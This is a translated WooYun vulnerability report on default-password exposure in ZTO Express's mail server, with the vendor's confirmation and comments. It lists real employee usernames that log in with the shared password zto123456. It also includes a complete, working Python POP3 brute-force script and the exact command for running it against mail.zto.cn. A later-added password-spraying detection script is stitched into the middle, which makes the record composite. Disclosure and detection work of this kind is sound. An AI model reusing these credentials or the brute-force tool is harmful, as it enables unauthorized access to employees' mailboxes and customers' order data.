
Vulnerability summary

Defect ID: wooyun-2015-0156014

Title: Express-delivery security: ZTO Express mail system leaks information for multiple accounts (includes internal address book, Dangdang and Tmall order details; verification script attached)

Vendor: ZTO Express (中通速递)

Author: harbour_bin

Submitted: 2015-11-26 11:15

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: sensitive information disclosure

Severity: High

Self-assessed Rank: 15

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-26: Details sent to the vendor, awaiting vendor handling
2015-11-26: Vendor confirmed; details disclosed to the vendor only
2015-12-06: Details disclosed to core white hats and domain experts
2015-12-16: Details disclosed to regular white hats
2015-12-26: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public

Brief description:

See title.

Detailed description:

1.

URL: http://mail.zto.cn/index.php


[+] Login successful: zhouyanan zto123456
[+] Mail: 18882 emails
[+] Login successful: wangfang zto123456
[+] Mail: 212 emails
[+] Login successful: liyong zto123456
[+] Mail: 9 emails
[+] Login successful: liuting zto123456
[+] Mail: 44 emails
[+] Login successful: xiaoqian zto123456
[+] Mail: 16 emails
[+] Login successful: qiuline zto123456
[+] Mail: 109 emails
[+] Login successful: liping zto123456
[+] Mail: 957 emails
[+] Login successful: yeqing zto123456
[+] Mail: 273 emails
[+] Login successful: wangbin zto123456
[+] Mail: 205 emails
[-] Done


Conclusion: zto123456 is most likely the default password.
2. Log in to a mailbox to demonstrate the impact
Nearly 20,000 messages exchanged with Dangdang and Tmall

zto.png


Internal address book

zto1.png


Daily orders

zto3.png


zto4.png


Other sensitive information

zto2.png


zto5.png


More data could be collected from these mailboxes and used for further mailbox testing.

Proof of vulnerability:

Demonstrated above.
Test code, usable for internal testing:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Python 2 script (print statements); indentation restored from the original post.
import sys
import poplib

if len(sys.argv) != 5:
    print "\t Note: 邮箱类型为:中通 \n"
    print "\t Note: 用户字典不需要域名后缀,例如zhangsan\n"
    print "\t Usage: 使用方法:./mail.py type <userlist> <wordlist> mail.domain.com\n"
    sys.exit(1)
server = sys.argv[4]
success = []
try:
    # Read both lists; each file is closed when its with-block ends.
    with open(sys.argv[2], "r") as users_list:
        users = users_list.readlines()
    with open(sys.argv[3], "r") as words_list:
        words = words_list.readlines()
except IOError:
    print "[-] Error: please check filename\n"
    sys.exit(1)

# Check once that the server answers on POP3S before entering the loop.
try:
    pop = poplib.POP3_SSL(server, 995)
    welcome = pop.getwelcome()
    print welcome
    pop.quit()
except poplib.error_proto:
    print "[-] Error: No Response,Something wrong!!!\n"
    sys.exit(1)
print "[+] Server:", server
print "[+] Users Loaded:", len(users)
print "[+] Words Loaded:", len(words)
print "[+] Server response:", welcome, "\n"


def mailbruteforce(listuser, listpwd, type):
    # 'type' (the mail system type) is accepted but unused, as in the original.
    if len(listuser) < 1 or len(listpwd) < 1:
        print "[-] Error: An error occurred: No user or pass list\n"
        return 1

    for user in listuser:
        user = user.replace("\n", "")
        for passwd in listpwd:
            passwd = passwd.replace("\n", "")
            try:
                print "-" * 12
                print "[+] User:", user, "Password:", passwd

                # time.sleep(0.5)
                popserver = poplib.POP3_SSL(server, 995)
                popserver.user(user)
                auth = popserver.pass_(passwd)
                print auth
                if auth.split(' ')[0] == "+OK" or auth == "+OK":
                    count, size = popserver.stat()  # message count and mailbox size
                    success.append((user, passwd, count, size))
                    print len(success)
                    popserver.quit()
                    break  # password found, move on to the next user
                else:
                    popserver.quit()
                    continue
            except Exception:
                # A rejected password raises poplib.error_proto; connection errors are ignored too.
                pass


if __name__ == '__main__':
    mailbruteforce(users, words, sys.argv[1])

    print "\t[+] have weakpass :\t", len(success)
    if len(success) >= 1:
        for ret in success:
            print "\n\n[+] Login successful:", ret[0], ret[1]
            print "\t[+] Mail:", ret[2], "emails"
    print "\n[-] Done"


Usage:

D:\Python>python mail\zto.py Winmail mail\zto.txt mail\pass\pass0.txt mail.zto.cn


The code is not perfect in places, but it works.
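The script and its run above show the footprint a default-password sweep leaves on the mail server: one source address, many different usernames, a single password each, all within seconds. As an added example (not part of the original report or the author's script), the Python 3 code below flags that pattern in POP3 login logs from the defender's side; the Dovecot-style pop3-login line layout is an assumption, the sample lines are constructed, and `window_secs` and `min_users` are illustrative thresholds.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in a Dovecot-style pop3-login log format (an assumption:
# a real server's layout may differ, in which case LINE_RE needs adjusting).
SAMPLE_LOG = """\
Nov 26 10:01:02 mx dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<zhangsan>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Nov 26 10:01:03 mx dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<lisi>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Nov 26 10:01:04 mx dovecot: pop3-login: Login: user=<wangwu>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Nov 26 10:01:06 mx dovecot: pop3-login: Login: user=<sunqi>, method=PLAIN, rip=203.0.113.7, lip=192.0.2.10, TLS
Nov 26 10:05:00 mx dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<zhangsan>, method=PLAIN, rip=198.51.100.4, lip=192.0.2.10, TLS
Nov 26 10:05:09 mx dovecot: pop3-login: Login: user=<zhangsan>, method=PLAIN, rip=198.51.100.4, lip=192.0.2.10, TLS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?P<outcome>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>"
    r".*?rip=(?P<rip>[\d.]+)"
)


def parse_events(log_text):
    """Yield (timestamp, source_ip, user, success) for each line LINE_RE matches."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")  # year-less syslog stamp
            yield ts, m.group("rip"), m.group("user"), m.group("outcome") == "Login"


def detect_spray(log_text, window_secs=60, min_users=3):
    """Flag source IPs that touch >= min_users distinct accounts within window_secs:
    one password tried against many accounts; a user mistyping their own is ignored."""
    by_ip = defaultdict(list)
    for ts, rip, user, ok in parse_events(log_text):
        by_ip[rip].append((ts, user, ok))
    alerts = {}
    for rip, events in by_ip.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            window = [e for e in events[i:] if (e[0] - start).total_seconds() <= window_secs]
            users = {u for _, u, _ in window}
            if len(users) >= min_users:
                alerts[rip] = {
                    "distinct_users": len(users),
                    "failures": sum(1 for _, _, ok in window if not ok),
                    "compromised": sorted(u for _, u, ok in window if ok),
                }
                break  # one alert per source is enough
    return alerts
```

The `compromised` list is the set of accounts that accepted the sprayed password from that source, which is the list to reset first.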

Suggested fix:

You are the experts here!
PS: The SSO also has some issues; if the impact can be widened, I will submit that separately...

Copyright notice: when reposting, please credit the source: harbour_bin@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-11-26 11:53

Vendor reply:

Thank you for the white hat's hard work; we have contacted the person in charge to handle it. Next time, please redact contact details and similar information. Thanks.

Latest status:

None yet


Comments:

  1. 2015-11-26 11:17 | 疯狗 Verified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having seen every vulnerability under the sun, the mind is naturally free of mosaic.)

    Downstream security...

  2. 2015-11-26 11:27 | harbour_bin ( Regular white hat | Rank:485 Vulnerabilities:61 | Target Rank 600)

    @疯狗 Hi 狗哥...

  3. 2015-11-26 11:29 | 疯狗 Verified white hat ( Intern white hat | Rank:44 Vulnerabilities:2 | Having seen every vulnerability under the sun, the mind is naturally free of mosaic.)

    @harbour_bin :)

  4. 2015-11-26 12:19 | harbour_bin ( Regular white hat | Rank:485 Vulnerabilities:61 | Target Rank 600)

    That was fast...